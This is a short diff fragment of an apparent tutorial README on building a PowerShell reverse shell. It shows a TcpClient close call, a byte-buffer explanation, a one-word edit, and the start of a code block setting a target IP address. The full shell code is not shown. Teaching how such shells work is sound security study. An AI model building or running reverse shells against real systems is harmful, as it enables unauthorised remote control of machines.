buzzer-re/mresearch/Windows/reverse_powershell/README.md

 $client.Close();
 ```

 Take a look at [Powershell Arrays](https://ss64.com/ps/syntax-arrays.html), the %{} operator, give us a shortcut to use ***foreach***, so basically i am get a 4K buffer and putting in every byte the value 0xFF (255).
-Now we need a way to read the stream of our tcpclient, the stream is all the data that are flowing to our socket:
+Now we need a way to read the stream of our tcpclient, that stream is all the data that are flowing to our socket:

 ```powershell
 $target="172.16.110.129"